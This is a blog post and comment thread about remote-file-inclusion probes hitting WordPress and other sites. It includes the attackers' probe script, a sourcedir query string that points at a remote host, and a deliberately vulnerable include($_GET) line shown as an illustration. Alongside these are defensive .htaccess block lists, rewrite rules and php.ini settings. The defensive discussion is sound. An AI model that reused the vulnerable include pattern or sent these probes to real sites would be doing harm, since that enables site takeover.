A few days ago I installed the Bad Behavior plugin for WordPress just as an extra way of combatting spam comments etc. In two days it’s blocked 49 attempts by malicious scripts to access this blog. I just looked at the log and most of them are attempts to run a remote PHP script to see if I am running a vulnerable script. The remote scripts are all the same and simply contain
<?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>
Basically, from what I can see there are a bunch of script kiddies who like to call themselves hackers but haven’t got the first clue about real hacking. All they can do is follow step-by-step instructions they have found on security websites. A real hacker is a person who actually knows how things work and looks for ways to exploit them so that the makers can make their products more secure.
This post has had quite a few hits from people searching for information, so I have decided to add some.
If you are running WordPress then I highly recommend installing the Bad Behavior plugin as it has, to my knowledge, blocked all attempts by these kiddies. I have also added a couple of the banned user agents from Bad Behavior to my site’s .htaccess file to prevent them accessing the site altogether. It also blocks some known spambots.
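# Mark requests with known bad user agents or headers, then deny them (requires mod_setenvif)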
SetEnvIfNoCase User-Agent "^libwww-perl*" spammer=yes
SetEnvIfNoCase User-Agent "^Mozilla/5\.0$" spammer=yes
SetEnvIfNoCase User-Agent "^Java/1*" spammer=yes
SetEnvIfNoCase User-Agent "^Java 1*" spammer=yes
SetEnvIfNoCase User-Agent "^<sc" spammer=yes
SetEnvIfNoCase User-Agent "^Jakarta*" spammer=yes
SetEnvIfNoCase User-Agent "^TrackBack*" spammer=yes
SetEnvIfNoCase User-Agent "^USERAGENT$" spammer=yes
SetEnvIfNoCase Via pinappleproxy spammer=yes
SetEnvIfNoCase X-AAAAAAAAAAAA 1 spammer=yes
Deny from env=spammer
Just remember it is also up to you to make sure that any scripts you are running on your site, be they a forum, a blog, a guestbook, etc., are the latest versions.
BTW, if you came here because you found a file containing the FeeL.CoMz text from above, then I’m sorry to say your site has already been exploited by these idiots. All you can do is look for other files last modified around the same time to see what else they did. Then make sure your scripts are updated.
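For what it’s worth, a quick way to do that last step is to compare modification times against a file you already know the attackers touched. This is only a rough PHP sketch, assuming you can drop a script in the site root; ‘hacked-file.php’ and the one-hour window are placeholders you would change:
<?php
// Compare every file's mtime against a file known to have been touched by the attackers.
$suspect = filemtime('hacked-file.php'); // placeholder: a file you know was modified
$window  = 3600;                         // look one hour either side; adjust as needed
$iter = new RecursiveIteratorIterator(new RecursiveDirectoryIterator('.'));
foreach ($iter as $file) {
    if ($file->isFile() && abs($file->getMTime() - $suspect) <= $window) {
        echo $file->getPathname() . ' ' . date('Y-m-d H:i:s', $file->getMTime()) . "\n";
    }
}
?>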
I saw similar activity on my logs.
The domain with the remote file was gumansin.com, and the IP address 118.100.71.15.
The sad thing is that it wasn’t some bot like usual, but some stupid kids browsing my site and then trying to append that to the URL. Googlebot picked the thing up and crawled the links too, getting 200 responses, so they had a real browser running Google’s JavaScript from my pages.
I did scan the database and everything was fine. Serving cached files can also be useful against dynamic requests.
Regards
I liked Bad Behavior blocking these scripts even earlier than my current stuff does. But Bad Behavior also broke a lot of stuff in WordPress. For instance, scheduled posts no longer worked, because Bad Behavior flagged wp-cron initiated hits.
Yes, I have to agree that Bad Behavior can be too strict and doesn’t give you enough control over what it blocks. Personally I am happy to accept the Range header, and I do feel it blocks the occasional legitimate user. I would like the option to enable/disable the various checks it does, as I feel that only the user agent and Accept header checks are what I need. I have other anti-spam stuff in place to deal with spammers.
Script kiddies, hardly even that. They have attempted to run the same script on my site. What makes it even worse is that the muppets are trying to execute this PHP script on my ASP.NET server. n00bs.
If the vulnerability is successfully exploited, that snippet of code will appear on your blog page. From that, the script can tell if you are vulnerable to a particular exploit. Once it’s found 1000 or so vulnerable sites, suddenly the “script kiddie” has a potentially quite valuable list, which he can then sell or use to exploit the sites himself.
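For anyone wondering what the hole itself looks like, this is a hedged sketch of the kind of unchecked include those probes hunt for; the parameter name and file name are just illustrative:
<?php
// Hypothetical vulnerable line: the script trusts a URL parameter as an include path.
// With remote includes enabled (allow_url_fopen / allow_url_include on), PHP fetches
// the attacker's URL and executes it, and its output ("FeeLCoMz") shows up in the page,
// which is exactly the tell-tale the probe script checks for.
include($_GET['sourcedir'] . '/header.php');
?>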
I have had this string in a query string (URL obfuscated with spaces):
(Query): ?sourcedir=http://www . sitecpro . com/files/error??
I have had the attack attempted on several pages (it doesn’t work on my sites anyway, but it’s annoying because of the bandwidth loss).
The code is not much. Apparently, it is only text.
So should I warn the owner of the site, and maybe Google? I mean, is this a threat to others if they visit the page?
BTW, usually I would expect this attack to come from several IPs (like what spambots do when they work in groups), but only one was used:
IP 187.35.144.68
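For what it’s worth, one way to at least cut the bandwidth loss from those ?sourcedir=http://... probes (assuming mod_rewrite is available and the rules go in .htaccess) is to refuse any request that passes a full URL as a query-string value. Just a sketch:
RewriteEngine On
# Return 403 when any query-string parameter value starts with http:// or https://
RewriteCond %{QUERY_STRING} (^|&)[^=&]*=https?:// [NC]
RewriteRule .* - [F]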
Hmmm… I tried to add the code from the attacked page, but it was stripped by your comment form. It is basically the same as what you wrote in the post.
I am not concerned about my own sites when I see these attempts, but I am concerned about those bastards getting richer because they expand their botnet by hacking low-security sites they can control. They do not just own a lot of private zombied PCs via malware, they own servers as well. That is a lot of power to have.
The number of attacks etc. I see coming from exploited sites is ridiculous. Part of the problem is that anyone can make a site, and a lot of script writers do not make it clear that the user needs to keep their scripts up to date, otherwise their site is at risk.
The attacks probably go on, because they work.
This was also why I thought, ‘Why on earth did the programmers of the targeted script make remote inclusion possible in the first place?’
Damn the criminals, but there is no reason to make it easier for them either. Take away that inclusion (disable it in every script where possible, and do not use it in the future), and the criminals have to find other ways of attacking.
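If I understand the PHP side correctly, the switches for this live in php.ini: allow_url_include (separate from allow_url_fopen since PHP 5.2; older versions only have the latter). A sketch, assuming you control the server configuration:
; php.ini
allow_url_fopen = Off     ; fopen()/file_get_contents() can no longer fetch remote URLs
allow_url_include = Off   ; include/require can no longer pull code over HTTP (PHP 5.2+)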
Maybe I got it wrong?
My own best practice – one of them – is: never use anything from the query string (or anything else the user can control) directly.
Including executable scripts cross-domain, without even validating the included file, seems like asking for trouble in that sense.
I have made the mistake before of not validating my inputs properly, which resulted in the ability to include remote files. I quickly patched it and released an update, but if people do not keep themselves informed of updates and then apply them, these idiots will abuse the holes.
Hmm… I would probably have hardcoded the list of included files, and only allowed non-negative integers in the query string that didn’t exceed the bounds of the array.
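Something like this is what I have in mind; just a rough PHP sketch where the file names and the ‘p’ parameter are made up:
<?php
// Hardcoded list of includable files; nothing outside this list can ever be included.
$pages = array('home.php', 'news.php', 'contact.php');
// Cast to int and bounds-check, so only valid indexes into the array are accepted.
$i = isset($_GET['p']) ? (int) $_GET['p'] : 0;
if ($i < 0 || $i >= count($pages)) {
    $i = 0; // anything out of range falls back to the first page
}
include $pages[$i];
?>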
But there would still be confusion about which files were allowed to be included where, which makes me a bit wary of this approach in the first place. I also do not like it because the URL can be bookmarked and indexed by search engines, which I may not want. The logic of the page should be hidden from the user…
I don’t think it is possible in classic ASP to include executable script files that way (via a variable that sets the included file’s path/name) either.
Yeah, I still use the same hardcoded include style from around 2000. ASP is an extinct language today, I know.